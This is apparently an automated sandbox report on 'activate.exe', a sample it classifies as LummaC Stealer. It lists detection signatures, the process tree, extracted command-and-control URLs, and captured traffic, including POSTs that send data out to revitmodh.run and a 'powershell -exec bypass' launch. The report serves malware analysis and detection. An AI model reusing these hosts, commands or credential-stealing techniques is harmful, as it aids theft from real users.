Edit tour

Windows Analysis Report
activate.exe

Overview

General Information

Sample name:	activate.exe
Analysis ID:	1664027
MD5:	045da589d63bfd00ad801c78bbeebbe6
SHA1:	513f1b7e7652a6f17af52bfdb3b393fbbb9af488
SHA256:	870a29a9b9eab5de45354a1b1c621b833e41ded4fbba41432d7d5ecb63b35a42
Tags:	de-pumpedexeuser-abuse_ch
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious PowerShell Parameter Substring

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

activate.exe (PID: 3036 cmdline: "C:\Users\user\Desktop\activate.exe" MD5: 045DA589D63BFD00AD801C78BBEEBBE6)

powershell.exe (PID: 3096 cmdline: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["revitmodh.run/pzaw", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "xcelmodo.run/nahd"], "Build id": "bd537175fb5382f772fe9489e63ee4902b442b0207"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.2215577787.0000000006442000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1583640019.0000000006442000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1584019025.0000000006442000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.3179179419.0000000006442000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: activate.exe PID: 3036	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: activate.exe PID: 3036	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, CommandLine: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\activate.exe", ParentImage: C:\Users\user\Desktop\activate.exe, ParentProcessId: 3036, ParentProcessName: activate.exe, ProcessCommandLine: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, ProcessId: 3096, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, CommandLine: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\activate.exe", ParentImage: C:\Users\user\Desktop\activate.exe, ParentProcessId: 3036, ParentProcessName: activate.exe, ProcessCommandLine: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, ProcessId: 3096, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, CommandLine: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\activate.exe", ParentImage: C:\Users\user\Desktop\activate.exe, ParentProcessId: 3036, ParentProcessName: activate.exe, ProcessCommandLine: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>_passw, ProcessId: 3096, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-13T09:59:44.661130+0200	2028371	3	Unknown Traffic	192.168.2.5	49695	104.21.28.157	443	TCP
2025-04-13T09:59:46.337959+0200	2028371	3	Unknown Traffic	192.168.2.5	49696	104.21.28.157	443	TCP
2025-04-13T09:59:47.815018+0200	2028371	3	Unknown Traffic	192.168.2.5	49697	104.21.28.157	443	TCP
2025-04-13T09:59:49.576259+0200	2028371	3	Unknown Traffic	192.168.2.5	49698	104.21.28.157	443	TCP
2025-04-13T09:59:52.423917+0200	2028371	3	Unknown Traffic	192.168.2.5	49699	104.21.28.157	443	TCP
2025-04-13T09:59:53.696957+0200	2028371	3	Unknown Traffic	192.168.2.5	49700	104.21.28.157	443	TCP
2025-04-13T09:59:55.705693+0200	2028371	3	Unknown Traffic	192.168.2.5	49701	104.21.28.157	443	TCP
2025-04-13T09:59:56.622809+0200	2028371	3	Unknown Traffic	192.168.2.5	49702	104.22.68.199	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["revitmodh.run/pzaw", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "xcelmodo.run/nahd"], "Build id": "bd537175fb5382f772fe9489e63ee4902b442b0207"}

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: revitmodh.run/pzaw
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: soursopsf.run/gsoiao
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: changeaie.top/geps
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: easyupgw.live/eosz
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: liftally.top/xasj
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: upmodini.digital/gokk
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: salaccgfa.top/gsooz
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: zestmodp.top/zeda
Source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp	String decryptor: xcelmodo.run/nahd

Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDF5D0 CryptUnprotectData,	0_2_04DDF5D0
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDF63E CryptUnprotectData,	0_2_04DDF63E
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_04DDA385 CryptUnprotectData,	0_2_04DDA385

Source: activate.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.157:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.68.199:443 -> 192.168.2.5:49702 version: TLS 1.2

Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then jmp eax	0_2_04DCF492
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_04DEACAE
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]	0_2_04DDFDF0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0Ch]	0_2_04DDFDF0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_04DD8FD0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]	0_2_04DD8FD0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-76B691C0h]	0_2_04DD8FD0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_04DF5F78
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	0_2_04E0D710
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-598BE2DCh]	0_2_04DD20F1
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_04DCD8E0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-3BEED3DEh]	0_2_04DCD8E0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+30h]	0_2_04DEE880
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7306D3F8h]	0_2_04DEE2A0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-76B691C4h]	0_2_04DEE2A0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+04h]	0_2_04E0EB60
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_04DF4B5B
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx eax, byte ptr [edx+esi]	0_2_04E0E340
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_04DC9CE0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_04DC9CE0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov ebp, eax	0_2_04DC8480
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_04DF441F
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_04DF0C0C
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78B56C56h]	0_2_04DE3C27
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+01h]	0_2_04DC1C20
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_04DCEDCB
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_04DF45F0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_04E0EDD0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then jmp dword ptr [04E15274h]	0_2_04DEF5AC
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov esi, eax	0_2_04DF557A
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-76B69200h]	0_2_04DEDD76
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-76B69200h]	0_2_04DEDD71
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_04DE7520
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	0_2_04DEDB16
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-76B69200h]	0_2_04DEDB16
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	0_2_04DEDEA2
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-76B69200h]	0_2_04DEDEA2
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_04DE1E4A
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_04DE1E4A
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then lea ecx, dword ptr [esp+7Ch]	0_2_04DDB635
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then lea ecx, dword ptr [esp+7Ch]	0_2_04DDB635
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_04DC1FF0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp dword ptr [ebp-14h], 00000000h	0_2_04DEDFEE
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx-7FFFFFFFh]	0_2_04E0DF90
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-3589894Ch]	0_2_04DD0F55
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	0_2_04DCAF50
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_04DF5F7C
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	0_2_04DEFF6E
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_04DD8F10
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi-73D703B8h]	0_2_04DD1708
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_04DECF05
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	0_2_04DECF05
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]	0_2_04DE309C
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp word ptr [ecx+edx], 0000h	0_2_04DE309C
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_04DE309C
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1933412Ah]	0_2_04DEE8A0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+18h]	0_2_04DD0073
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-00000096h]	0_2_04DCC830
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-0000077Dh]	0_2_04DCC830
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+esi]	0_2_04DCC830
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-76B69194h]	0_2_04DF01D5
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	0_2_04DE8180
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_04DF21B0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000704h]	0_2_04DDF17C
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov ecx, eax	0_2_04E0B120
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	0_2_04E0B120
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_04DF5134
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_04DF5122
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov esi, eax	0_2_04DF5AFA
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_04DDAB94
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	0_2_04DE7BB0
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ebx]	0_2_04DF0332
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then push ebx	0_2_04E03B10
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+04h]	0_2_04E03B10
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], BEB994C9h	0_2_04DF0B2D
Source: C:\Users\user\Desktop\activate.exe	Code function: 4x nop then movzx edi, byte ptr [ebp+eax-76B69244h]	0_2_04DF0B2D

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: revitmodh.run/pzaw
Source: Malware configuration extractor	URLs: soursopsf.run/gsoiao
Source: Malware configuration extractor	URLs: changeaie.top/geps
Source: Malware configuration extractor	URLs: easyupgw.live/eosz
Source: Malware configuration extractor	URLs: liftally.top/xasj
Source: Malware configuration extractor	URLs: upmodini.digital/gokk
Source: Malware configuration extractor	URLs: salaccgfa.top/gsooz
Source: Malware configuration extractor	URLs: zestmodp.top/zeda
Source: Malware configuration extractor	URLs: xcelmodo.run/nahd

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic

HTTP traffic detected: GET /raw/yKBaQkD9 HTTP/1.1Connection: Keep-AliveHost: pastebin.com

Source: Joe Sandbox View

IP Address: 104.22.68.199 104.22.68.199

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 104.21.28.157:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49695 -> 104.21.28.157:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49697 -> 104.21.28.157:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49696 -> 104.21.28.157:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 104.21.28.157:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.28.157:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 104.21.28.157:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 104.22.68.199:443

Source: global traffic	HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: revitmodh.run
Source: global traffic	HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8vA5GOKI6bzYGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14898Host: revitmodh.run
Source: global traffic	HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=dbW72WWdvIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15032Host: revitmodh.run
Source: global traffic	HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C28rf67dKYGIEt35fjvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20566Host: revitmodh.run
Source: global traffic	HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=xjztY5CEtv4GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2391Host: revitmodh.run
Source: global traffic	HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=nfCG5plnEQ85tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 573899Host: revitmodh.run
Source: global traffic	HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 89Host: revitmodh.run

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /raw/yKBaQkD9 HTTP/1.1Connection: Keep-AliveHost: pastebin.com

Source: global traffic	DNS traffic detected: DNS query: revitmodh.run
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: unknown

HTTP traffic detected: POST /pzaw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: revitmodh.run

Source: global traffic

